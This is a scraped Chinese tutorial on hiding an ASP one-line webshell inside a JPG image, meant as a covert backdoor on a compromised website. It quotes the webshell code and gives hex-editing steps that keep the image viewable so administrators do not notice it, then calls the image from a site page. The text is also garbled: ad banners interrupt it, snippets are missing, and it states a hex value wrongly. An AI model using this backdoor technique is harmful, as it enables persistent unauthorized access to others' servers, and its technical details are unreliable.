一句话木马图片制作三种方法重点讲义资料VIP专享

精品文档---下载后可任意编辑Copy 命令制作1.asp 内容：打开 cmd，数据一下命令：此时打开两个 jpg 文件，相比：且打开 2.jpg 可以像 1.jpg 一样显示图像。把以下代码放入目标网站，即可按 asp 执行。<% #include files=””%>Uedit32（转载）：本制作来自于：雪糕。我们通常在得到 webshell 之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。但假如直接加入一句话木马<%execute request("value")%>到 asp 文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误 '800a000d'精品文档---下载后可任意编辑类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。而且我们假如有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个 asp 文件中加入调用图片后门的代码：这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的 asp 文件改成 jpg 或 gif 文件的时候，这个图片文件是打不开的，这又容易被管理员发现。然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。制作步骤：一、前期准备材料：2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）Script 标签：4.调用图片后门代码：工具：UltraEdit二、开始制作：UltraEdit 打开 1.jpg 文件，然后按 CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是 3E 25，那么%>就应该是 25 3E，但是我们只把 25 改成 00；之后我们在新建一个文本编辑窗口，将我们的 script 标签代码精品文档---下载后可任意编辑复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到 1.jpg 的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把 srcipt 标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话...